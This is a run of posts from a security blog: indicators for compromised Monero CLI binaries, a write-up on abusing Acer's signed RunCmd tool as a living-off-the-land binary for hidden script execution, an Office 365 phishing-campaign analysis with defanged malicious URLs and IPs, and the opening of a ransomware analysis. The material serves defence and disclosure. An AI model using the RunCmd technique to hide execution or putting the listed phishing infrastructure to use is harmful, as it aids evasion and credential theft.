<b>Note</b>: What is a hash? A hash is a unique identifier. This can be for a file, a word, ... It is preferred to use SHA256 hashes for file integration checks, as it is more secure.</div>
<div>
<br /></div>
<div>
You may also use the following Yara rule to detect the malicious or compromised binaries:</div>
<div>
<a href="https://gist.github.com/bartblaze/5578998ed706349d14008a2428428dc6" target="_blank">Monero_Compromise.yar</a><br />
Download Yara (and documentation) from:<br />
<a href="https://github.com/VirusTotal/yara" target="_blank">https://github.com/VirusTotal/yara</a></div>
<div>
<br />
There's an additional analysis by <i>SerHack </i>here:<br />
<a href="https://serhack.me/articles/cli-binaries-compromised-monero-analysis/">https://serhack.me/articles/cli-binaries-compromised-monero-analysis/</a></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Recommendations</span></b></div>
<ul>
<li>Install an antivirus, and if possible, use a firewall (free or paid is of less importance);</li>
<li>If you already use an antivirus: it may be a good idea to not exclude a specific folder in your antivirus when using Monero (or other miners), and if needed, only do so <b>after</b> the hashes have been verified;</li>
<li>Restore your seed or account;</li>
<ul>
<li>How to restore your account: <a href="https://web.getmonero.org/resources/user-guides/restore_account.html" target="_blank">https://web.getmonero.org/resources/user-guides/restore_account.html</a></li>
<li>Recovering wallet using the mnemonic seed: <a href="https://monero.stackexchange.com/questions/10/how-can-i-recover-a-wallet-using-the-mnemonic-seed" target="_blank">https://monero.stackexchange.com/questions/10/how-can-i-recover-a-wallet-using-the-mnemonic-seed</a></li>
</ul>
<li>Monitor your account/wallet for the next days and verify there have been no fraudulent transactions. Contact the Monero team for support.</li>
</ul>
<div>
<b>Note</b>: Especially go through the steps if at any point you downloaded, used or installed new binaries between these dates: Monday 18th 1:30 AM UTC and 5:30 PM UTC. Download the latest version from: <a href="https://web.getmonero.org/downloads/" target="_blank">https://web.getmonero.org/downloads/</a>.<br />
<br />
<b><span style="font-size: large;">Monero team statement</span></b></div>
<div>
<br />
The Monero team has issued a statement as follows:<br />
<br />
Warning: The binaries of the CLI wallet were compromised for a short time:</div>
<div>
<a href="https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html" target="_blank">https://web.getmonero.org/2019/11/19/warning-compromised-binaries.html</a><br />
<br />
I expect this statement to be updated the following days, so monitor it as well.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
Monero is not the first, nor will it likely be the last cryptocurrency (in this case, its website and binaries) that gets compromised.<br />
<br />
Follow the steps in this blog post to protect yourself and always watch your online accounts closely, especially those where you have financially invested in. Use strong passwords, use MFA (or 2FA) where possible and always be vigilant. Verify hashes when a new version is available.<br />
<br />
Note: this blog post is not intended to be a full analysis, but rather a quick report on the facts, including recommendations. Questions or feedback? Happy to hear it!<br />
<br />
Let me know in the comments below or on <a href="https://twitter.com/bartblaze/" target="_blank">Twitter</a>.<br />
<br />
<br /></div>
<div>
<br /></div>
<div>
<b>Indicators</b></div>
<br />
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #2F8B49;
color: #FFF;
font-weight: bold;
}
</style>
<br />
<table class="tableizer-table">
<thead>
<tr class="tableizer-firstrow"><th>Indicator type</th><th>Indicator</th></tr>
</thead><tbody>
<tr><td>FileHash-SHA256</td><td>7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31</td></tr>
<tr><td>FileHash-SHA256</td><td>963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74</td></tr>
<tr><td>hostname</td><td>www.hashmonero.com</td></tr>
<tr><td>hostname</td><td>node.xmrsupport.co</td></tr>
<tr><td>hostname</td><td>node.hashmonero.com</td></tr>
<tr><td>FileHash-MD5</td><td>d267be7efc3f2c4dde8e90b9b489ed2a</td></tr>
<tr><td>FileHash-MD5</td><td>72417ab40b8ed359a37b72ac8d399bd7</td></tr>
<tr><td>FileHash-SHA1</td><td>6bd94803b3487ae1997238614c6c81a0f18bcbb0</td></tr>
<tr><td>FileHash-SHA1</td><td>394bde8bb86d75eaeee69e00d96d8daf70df4b0a</td></tr>
<tr><td>IPv4</td><td>91.210.104.245</td></tr>
<tr><td>IPv4</td><td>45.9.148.65</td></tr>
<tr><td>domain</td><td>hashmonero.com</td></tr>
<tr><td>domain</td><td>xmrsupport.co</td></tr>
</tbody></table>
<br />
On AlienVault:<br />
<br />
<a href="https://otx.alienvault.com/pulse/5dd4574fc7c82cddbdcb8d12" target="_blank">https://otx.alienvault.com/pulse/5dd4574fc7c82cddbdcb8d12</a><br />
<br />
<b>MITRE ATT&CK techniques</b><br />
<b><br /></b>
<a href="https://attack.mitre.org/techniques/T1195/" target="_blank">ID: T1195 - Supply Chain Compromise</a><br />
<a href="https://attack.mitre.org/techniques/T1199/" target="_blank">ID: T1199 - Trusted Relationship</a><br />
<br />
<script src="https://otx.alienvault.com/pulse/5dd4574fc7c82cddbdcb8d12.js"></script>
</div>
</div>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com9tag:blogger.com,1999:blog-606282676955748155.post-61548749477495511192019-03-17T22:17:00.000+01:002019-03-18T10:51:25.604+01:00Run applications and scripts using Acer's RunCmd<br />
This weekend I was cleaning up an old Acer laptop of mine and discovered a hidden folder on the root drive, <b>C:\OEM</b>.<br />
<br />
Inside's a bunch of interesting files, one of these is a tool called <b>RunCmd_X64.exe</b>.<br />
<br />
The file is a legitimate and signed binary by Acer:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-lnm4B6kgKk0/XI6xFzeBkLI/AAAAAAAACLY/bByQ8QKKJpkAJYE0DkKzjGP8c2S5SDRTwCLcBGAs/s1600/acersig.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="637" data-original-width="421" height="320" src="https://2.bp.blogspot.com/-lnm4B6kgKk0/XI6xFzeBkLI/AAAAAAAACLY/bByQ8QKKJpkAJYE0DkKzjGP8c2S5SDRTwCLcBGAs/s320/acersig.PNG" width="211" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Signed RunCmd_X64</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The tool contains a useful help file as follows:<br />
<br />
<blockquote class="tr_bq">
A tool to execute a command file.<br />
RunCmd.exe filepath [/T | /F]<br />
<span style="white-space: pre;"> </span> filepath <span style="white-space: pre;"> </span> full path name or file name<br />
<span style="white-space: pre;"> </span> /T <span style="white-space: pre;"> </span> launch command file and open the console window<br />
<span style="white-space: pre;"> </span> /F <span style="white-space: pre;"> </span> launch command file and hide the console window<br />
If there is not any flag, /T or /F, the default situation is hiding window<br />
Examples:<br />
<span style="white-space: pre;"> </span> RunCmd.exe "D:\EnBT.cmd" /T<br />
<span style="white-space: pre;"> </span> RunCmd.exe "EnBT.cmd" /F</blockquote>
<br />
Simply put, you can use Acer's tool as an alternative to the built-in command prompt, and to launch other applications! Additionally, using the <b>/F</b> parameter or flag will hide the console window, which is by default if there isn't any parameter!<br />
<br />
Some simple examples:<br />
<br />
<b>Run an application directly</b><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-nENZxK9eLX8/XI60qxsmNFI/AAAAAAAACLo/oTv18my8CJg5ZzAxMHlTFkMscZHMFDc-ACLcBGAs/s1600/acercalc1.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="460" data-original-width="956" height="191" src="https://1.bp.blogspot.com/-nENZxK9eLX8/XI60qxsmNFI/AAAAAAAACLo/oTv18my8CJg5ZzAxMHlTFkMscZHMFDc-ACLcBGAs/s400/acercalc1.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Running calc.exe</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>Run virtually anything using a script </b><br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-lWc4T3Mjlww/XI60q2T2IXI/AAAAAAAACLk/XXCycWDJWaAZB1MgPKR4SgMOIF9t_VfIwCLcBGAs/s1600/acercalc2.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="326" data-original-width="956" height="136" src="https://2.bp.blogspot.com/-lWc4T3Mjlww/XI60q2T2IXI/AAAAAAAACLk/XXCycWDJWaAZB1MgPKR4SgMOIF9t_VfIwCLcBGAs/s400/acercalc2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Running calc using a batch file</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Note that since no parameter is used, the RunCmd tool will run silently and tools such as Process Explorer show a non-existent parent process.<br />
<br />
In theory, you can run any script or scriptlet using Acer's tool to execute "command files" :)<br />
<br />
<b>For attackers</b><br />
<br />
This "LOLBin", or at the least reusing a legitimate and signed binary for malicious purposes, has the following MD5 hash:<br />
<br />
<b>RunCmd_X64 - d71fb1b03bf84fae29af9b2dc525ba33</b><br />
<br />
There is also a 32-bit version, however, this binary is not signed.<br />
<br />
<b>RunCmd - 4d50588568cae95331f00cbdb52be37a</b><br />
<br />
<br />
<b>For defenders</b><br />
<br />
See "For attackers". Additionally, the RunCmd tool will attempt to create a folder named "<b>RunCmdLog" </b>to store logfiles. An example logfile is as follows:<br />
<blockquote class="tr_bq">
<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>TRACE<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>ENTER: main<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>TRACE<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>EXIT: main<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>Para 1: calc.bat<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>Para 2:<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>command: C:\Tools\Acer\calc.bat<br />
2019-03-17 21:00:37<span style="white-space: pre;"> </span>[ 193C]<span style="white-space: pre;"> </span>INFO<span style="white-space: pre;"> </span>main -<span style="white-space: pre;"> </span>command success</blockquote>
Log files will have the following format:<br />
%s%02d-%02d-%02d %02d-%02d-%02d.log<br />
<br />
Where %s is RunCmd and %02d is the date and time of execution. In our example above:<br />
RunCmd2019-03-17 21-00-37.log<br />
<br />
Why try using LOLBins when you can use tools installed by the manufacturer?<br />
<br />
<br />
<b>Resources</b><br />
<br />
Github - <a href="https://lolbas-project.github.io/" target="_blank">Living Off The Land Binaries and Scripts (and also Libraries)</a><br />
Hexacorn - <a href="http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/" target="_blank">Reusigned Binaries – Living off the signed land</a><br />
<br />
<br />Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com1tag:blogger.com,1999:blog-606282676955748155.post-44415605503069486622019-03-04T20:57:00.000+01:002019-05-24T19:28:09.548+02:00Analysing a massive Office 365 phishing campaign<br />
Last week, a friend of mine reached out with a query: a contact in his address book had sent him a suspicious email. As it turns out, it was. In this blog post, we'll have a quick look at an Office 365 phishing campaign, which turned out to be massive. This type of phishing has been on the rise for a while now (at least since 2017), and it's important to point out, as seemingly attacks are only increasing.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
As mentioned earlier, Office 365 (O365) phishing isn't new, but it is definitely prevalent. A high-level overview of a typical attack is as follows:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-I35Z45xSjZQ/XH1ajQ4plYI/AAAAAAAACJ8/_XlxaGjk0ZcuWc_sPH4nA2FeCOi4L4U6wCLcBGAs/s1600/dia.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="350" data-original-width="450" height="248" src="https://3.bp.blogspot.com/-I35Z45xSjZQ/XH1ajQ4plYI/AAAAAAAACJ8/_XlxaGjk0ZcuWc_sPH4nA2FeCOi4L4U6wCLcBGAs/s320/dia.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - High-level overview of typical O365 phishing</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A typical flow of such an attack may be as follows:<br />
<br />
<br />
<ol>
<li>An attacker sends an O365 spearphishing email, likely from a spoofed or fake email address;</li>
<li>The user is enticed to click on the link, or open the attachment which includes a link;</li>
<li>The user will then unknowingly enter their credentials on the fake O365 page;</li>
<li>Credentials get sent back to the attacker;</li>
<li>Attacker will access the now compromised user's mailbox; and,</li>
<li>The cycle repeats: the attacker will send spearphish emails to all of the compromised user's contacts - with this difference, it's coming from a legitimate sender.</li>
</ol>
<div>
This is exactly what happened to a friend of mine: he got sent an email from a legitimate email address, which was a contact in his address book - only the sender never intentionally sent this email! </div>
<div>
<br /></div>
<div>
Let's have a look at the infection chain.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">The initial email</span></b></div>
<div>
<br /></div>
<div>
The initial email sent looked as follows:</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-SJVzuDuxRzk/XH1dACCNrWI/AAAAAAAACKI/oYR19UHNO0IUqO5LQFpfb-VtvlVT8H-oQCLcBGAs/s1600/Email.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="614" data-original-width="1588" height="153" src="https://3.bp.blogspot.com/-SJVzuDuxRzk/XH1dACCNrWI/AAAAAAAACKI/oYR19UHNO0IUqO5LQFpfb-VtvlVT8H-oQCLcBGAs/s400/Email.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - "P.AYMENT COPY"</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Clicking on the "OPEN" button would redirect you to a legitimate but compromised Sharepoint (part of O365) webpage. Seeing as a legitimate business has been compromised, I won't post the link here. Its web administrators have been notified.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-l3Wi3oUg20A/XH1mqZleQPI/AAAAAAAACKU/Wl7iFzu2BI0eFtS1jhNsCOJRco8XJPFFACLcBGAs/s1600/pdf.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="896" data-original-width="1600" height="179" src="https://1.bp.blogspot.com/-l3Wi3oUg20A/XH1mqZleQPI/AAAAAAAACKU/Wl7iFzu2BI0eFtS1jhNsCOJRco8XJPFFACLcBGAs/s320/pdf.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - "Access OneDrive"</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><span style="font-size: large;">The PDF document</span></b><br />
<br />
Next step is hosting a PDF named "INVOICE.PDF", which entices the user to access OneDrive to view the shared file. If the user were to click on "OPEN PDF HERE":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-iSPQ4xCvS40/XH1nxS8PJ7I/AAAAAAAACKg/eydmdxc55MUko-QkWIz-NgVagraCBBYCQCLcBGAs/s1600/capt2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1108" data-original-width="1477" height="240" src="https://4.bp.blogspot.com/-iSPQ4xCvS40/XH1nxS8PJ7I/AAAAAAAACKg/eydmdxc55MUko-QkWIz-NgVagraCBBYCQCLcBGAs/s320/capt2.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - "Login with Office 365"</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
URI: <i>https://happymachineit[.]info/Michael/b4fb042ba2b3b35053943467ac22a370/OFE1.htm</i><br />
<br />
<b><span style="font-size: large;">The final landing or phishing page</span></b><br />
<br />
<br />
Finally, clicking on "Login with Office 365" will redirect the user to the final phishing page, which will look as follows:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-JYqFHo2IHpo/XH1olwcw4zI/AAAAAAAACKw/u2ligTIm69c48PXoGYLxQYIfp_FluFg7QCLcBGAs/s1600/Final.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="818" data-original-width="1024" height="255" src="https://2.bp.blogspot.com/-JYqFHo2IHpo/XH1olwcw4zI/AAAAAAAACKw/u2ligTIm69c48PXoGYLxQYIfp_FluFg7QCLcBGAs/s320/Final.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Final landing page</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The final landing page is as follows:<br />
<i>https://happymachineit[.]info/Michael/b4fb042ba2b3b35053943467ac22a370/7hsfabvj2b0b9rguzbzw910d.php</i><br />
<br />
When entering credentials, they will be sent off to the attacker, and the cycle from Figure 1 will repeat itself. Note that other scenarios are possible, for example:<br />
<ol>
<li>The attacker may try to (re-)sell credentials that have been gathered so far on criminal forums</li>
<li>The attacker may send more targeted spearphishes to potentially interesting victims</li>
<li>The attacker may attempt to access other services or accounts using the same user/password combination</li>
</ol>
<div>
In short, there's countless other possibilities.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">The phishing infrastructure</span></b></div>
<div>
<br /></div>
<div>
Avid readers will have noticed the phishing website uses a valid SSL certificate, which has the following details:</div>
<br />
<br />
<ul>
<li>Subject DN: <i>CN=happymachineit.info</i></li>
<li>Issuer DN: <i>C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority</i></li>
<li>Serial: <i>169382499542171049850152621295591104087</i></li>
</ul>
The SSL cert was issued by Comodo in January. Details can be found on <a href="https://censys.io/certificates/c2fb6841afd7cff441d2dedfab40c84a5c1ba5bf005c3721a398cf92660ed448">Censys.io</a>.<br />
<br />
An additional email address is connected with "happymachine": <i>fudtoolshop@gmail.com</i><br />
<br />
The phishing website encountered here, <i>https://happymachineit[.]info</i>, is hosted on the following IP: <i>178.159.36[.]107</i><br />
<br />
Pivoting on that IP brings us to the following SSL certificate details:<br />
<br />
<i>emailAddress=ssl@server.localhost.com, CN=server.localhost.com</i><br />
<br />
This means the certificate is a local and self-signed one. In other words, if you are accessing a secure website, and you see "<i>server.localhost.com</i>" as the SSL certificate, do NOT trust it. This is sometimes from an automatic setup from the hosting provider.<br />
<br />
As a side-note, a search for the Common Name (CN) mentioned above with Censys currently yields 473 (unexpired certs) results: <a href="https://censys.io/certificates?q=server.localhost.com" target="_blank">https://censys.io/certificates?q=%28server.localhost.com%29+AND+tags.raw%3A+%22unexpired%22&</a><br />
<br />
Performing a <a href="https://community.riskiq.com/search/178.159.36.107" target="_blank">search</a> with RiskIQ's PassiveTotal as well as <a href="https://www.virustotal.com/en/ip-address/178.159.36.107/information/" target="_blank">VirusTotal</a>, and after filtering results, we obtain a whopping total of <b><u>875</u></b> <u><b>unique</b> </u>Office 365 phishing sites, hosted on that IP alone! It appears this campaign has been active since December 2018.<br />
<br />
Searching a bit further, it appears the whole ASN (which is a collection of IP prefixes controlled by a single entity, typically an ISP), <a href="https://urlscan.io/asn/AS48666" target="_blank">AS48666</a> is in fact riddled with Office 365 as well as other phishing sites. Using <a href="https://urlscan.io/" target="_blank">URLscan.io</a> we can quickly gauge the ASN is hosting multiple phishing sites for Office 365 as well as Adobe:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-w9RtiI_UMCo/XH1000UM4vI/AAAAAAAACK8/lajhksY675wX15NpUCGYTkqQ40OjrtHcgCLcBGAs/s1600/ASN.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="521" data-original-width="1116" height="149" src="https://2.bp.blogspot.com/-w9RtiI_UMCo/XH1000UM4vI/AAAAAAAACK8/lajhksY675wX15NpUCGYTkqQ40OjrtHcgCLcBGAs/s320/ASN.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - AS48666 hosting badness</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<u>General Info:</u><br />
<br />
<ul>
<li>Geo: Russian Federation (RU) — </li>
<li>AS: AS48666 - AS-MAROSNET Moscow, Russia, RU </li>
<li>Registrar: RIPENCC</li>
</ul>
<br />
As shown in this blog post, one IP address can host tons of phishing instances, while the ASN controls multiple IPs. Bonus bad IP: <i>178.159.36[.]120. </i><br />
<br />
<br />
<span style="font-size: large;"><b>Detection</b></span><br />
<br />
For the phishing websites itself, any network traffic that resolves to the IP above.<br />
<br />
I've noticed there are countless similar PDFs from this same campaign. Due to the way these are created (likely in bulk), a simple Yara rule can be developed as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLYcek19GEL5L_FT0zeg63JVU57PocUJ7DHl3AIphGEytF3w_8QopMJJD8ZpkzERWs_XZb9QZyTrkhLM6KVqXtq9ApnN04_MvIVbThBdjZnmj-SHXqd7kk6ykdcr9RIY_7Lwm6v97egFfV/s1600/yararule.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="261" data-original-width="745" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLYcek19GEL5L_FT0zeg63JVU57PocUJ7DHl3AIphGEytF3w_8QopMJJD8ZpkzERWs_XZb9QZyTrkhLM6KVqXtq9ApnN04_MvIVbThBdjZnmj-SHXqd7kk6ykdcr9RIY_7Lwm6v97egFfV/s400/yararule.PNG" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The Yara rule can be found on Pastebin <a href="https://pastebin.com/cF9HMmHR" target="_blank">here</a> or on Github Gist <a href="https://gist.github.com/bartblaze/6814bdcf503f8b1a9c06a178423c9b74" target="_blank">here</a>.<br />
<div>
<br /></div>
Note: in specific instances, this rule may false-positive - so use at your own will.<br />
<br />
The following MITRE ATT&CK techniques are relevant:<br />
<br />
<ul>
<li><a href="https://attack.mitre.org/techniques/T1192/" target="_blank">T1192 - Spearphishing Link</a></li>
<li><a href="https://attack.mitre.org/techniques/T1193/" target="_blank">T1193 - Spearphishing Attachment</a></li>
<li><a href="https://attack.mitre.org/techniques/T1078/" target="_blank">T1078 - Valid Accounts</a></li>
</ul>
<br />
<br />
<b><span style="font-size: large;">Disinfection</span></b><br />
<br />
There isn't much to disinfect, since there's no actual malware involved.<br />
<br />
However, if you have been affected by this phishing campaign, do the following immediately:<br />
<br />
<ul>
<li>Contact your network and/or system administrator or managed services provider if you have one and wait for their response - if not;</li>
<li>Note down the phishing page/URL, then close any open phishing pages - in fact, close the whole browser;</li>
<li>Perform an antivirus scan with your installed product, and a scan with another application, for example Malwarebytes (better be safe than sorry);</li>
<li>Change your O365 password immediately;</li>
<li>Change passwords on other websites where you used the same combination;</li>
<li>Reach out to the people in your address book you were compromised and they are not to open your email(s) or at least not any attachments or links from your email(s);</li>
<li>Verify your "Sent" emails folder (or "Outbox") for any suspicious activity. If there are no Sent emails - the attacker may have deleted them, or you may have a full compromise on your hands.;</li>
<li>Verify any (newly) created rules in your mail application (in this case O365), for example, verify there are no new forwarding rules or perhaps rules that delete new incoming emails - forwarding rules and deletion rules are sometimes set up by an attacker to gather more information or as an attempt to remain hidden; and,</li>
<li>File a complaint with your CERT, local police station, or whichever authority would handle such cases. If you are unsure how to do so, have a look <a href="https://bartblaze.blogspot.com/2016/11/cybercrime-report-template.html" target="_blank">here</a> for assistance.</li>
</ul>
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
<ul>
<li>Block the IP (or whole subnet <i>178.159.36[.]0/24) </i>mentioned in this report in your firewall or proxy or other appliance;</li>
<li>Use strong and preferably unique passwords (use a password manager);</li>
<li>Set up 2FA for accounts or, preferably, MFA (multi-factor authentication);</li>
<li>Enable, deploy or implement anti-spam and anti-phishing protection;</li>
<li>Enable, deploy, or implement a URL phishing filter;</li>
<li>Trust, but verify: "did this contact really need to send me a "Payment Copy"? - if needed, verify via a phone call - <b>not</b> via email;</li>
<li>Be generally cautious with links and attachments. Do not click on links or open attachments from unknown senders; </li>
<li>If possible, use Firefox with <a href="https://noscript.net/" target="_blank">NoScript</a> enabled; and,</li>
<li>If you're in an organisation: create or organise user awareness training.</li>
</ul>
<br />
<b style="font-size: x-large;">Conclusion</b><br />
<span style="font-size: large;"><b><br /></b></span>
Phishing has been around for a long time - Office 365 phishing, on the other hand, has been around since, well, Office 365 was created. Every time a new service is created, you can imagine that phishing emails targeting that service will follow - maybe one month later, perhaps a year later - but they will.<br />
<br />
Always try to be vigilant and follow the prevention tips mentioned above to stay safe.<br />
<br />
As a side-note, the <u>real</u> Office 365 page is: <a href="https://outlook.office365.com/owa" target="_blank">https://outlook.office365.com/owa</a><br />
<br />
You may find more information in the <b>Resources</b> section below.<br />
<br />
<b>Resources</b><br />
<br />
Blaze's Security Blog - <a href="https://bartblaze.blogspot.com/2016/11/cybercrime-report-template.html" target="_blank">Cybercrime Report Template</a><br />
Decent Security - <a href="https://decentsecurity.com/#/malware-web-and-phishing-investigation/" target="_blank">Easily Report Phishing and Malware</a><br />
Microsoft - <a href="https://docs.microsoft.com/en-us/office365/securitycompliance/anti-phishing-protection" target="_blank">Anti-phishing protection in Office 365</a><br />
Microsoft - <a href="https://news.microsoft.com/en-gb/2019/01/07/government-backs-office-365-cloud-move-after-microsoft-guidance/" target="_blank">Microsoft publishes guidance to boost public sector cloud security</a><br />
Microsoft - <a href="https://docs.microsoft.com/en-us/office365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide" target="_blank">Set up multi-factor authentication</a><br />
Microsoft - <a href="https://docs.microsoft.com/en-us/office365/securitycompliance/set-up-anti-phishing-policies" target="_blank">Set up Office 365 ATP anti-phishing and anti-phishing policies</a><br />
<br />
<b>Indicators</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/5c7d848707dffd1d86f2d179.js"></script>
<b><br /></b>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com7tag:blogger.com,1999:blog-606282676955748155.post-79428014307042363692018-08-12T17:31:00.000+02:002018-08-18T23:15:22.126+02:00MAFIA ransomware targeting users in Korea<br />
A new ransomware family was discovered and sent to me by <a href="https://twitter.com/malwrhunterteam" target="_blank">MalwareHunterTeam</a>, which we'll call MAFIA due to the extension it uses to encrypt files. The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.<br />
<br />
Another interesting (and new to me) feature is the use of "Onion.Pet", a Tor proxy as a means for C2 (network) communication. Read the analysis below to find out more details on this ransomware. (not to be confused with <a href="https://twitter.com/BleepinComputer/status/817069320937345024" target="_blank">MafiaWare</a>, a Hidden Tear variant - the MAFIA ransomware described here is unique).<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
It's currently unknown how the MAFIA ransomware reaches a system, but it's likely delivered via spear-phishing, rather than a manual installation. The binary analysed here has the following properties:<br />
<br />
Properties:<br />
<ul>
<li><b>MD5</b>: da23c8a7be5d83ae3e6b7b3291fdb880</li>
<li><b>SHA1</b>: 419a00476e229f4b2fc85ffd54ed1e32b03c069d</li>
<li><b>SHA256</b>: d6dee35981698416804548185f09af9c27987a0423e35bffd5b543c50fb9b5e3</li>
<li><b>Compilation timestamp</b>: 2018-08-02 15:11:23
